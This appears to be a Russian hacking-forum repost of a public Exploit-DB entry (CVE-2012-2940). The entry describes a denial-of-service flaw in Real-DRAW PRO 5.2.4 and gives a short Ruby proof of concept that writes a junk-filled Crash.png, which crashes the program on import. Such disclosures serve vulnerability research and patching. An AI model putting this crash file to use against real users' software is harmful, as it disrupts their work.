Exploit Real-DRAW PRO 5.2.4 - Import File Crash

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
18902
Проверка EDB
  1. Пройдено
Автор
AHMED ELHADY MOHAMED
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2012-2940
Дата публикации
2012-05-21
Код:
Real-DRAW PRO 5.2.4 Import File Crash
===================================================================================
# Exploit Title:Real-DRAW PRO 5.2.4 Malicious PNG File Denial of service
# Vendor : http://www.mediachance.com/
# Author: Ahmed Elhady Mohamed
# Email : [email protected]
# Website: www.infosec4all.tk
# version: 5.2.4
# Category: DOS
# Tested on: windows XP SP3
===================================================================================



########################################DESC#############################################
#Real-Draw seamlessly combines vector tools with the rich look of pixel based images and#
#innovative natural paint techniques into a single graphics editor.                     #
#########################################################################################

########################################################################################
#Real-DRAW PRO 5.2.4 crashes while importing a crafted PNG, WMF, PSD, TGA, TTF, BMP,   #
#TIFF and PCX file                                                                     #
#To trigger the exploit , go to file->Import                                           #
########################################################################################

 
#!/usr/bin/ruby
 

File.open "Crash.png" , "w" do |file|
junk = "A" *1000
file.write junk
end
 
Источник
www.exploit-db.com

Похожие темы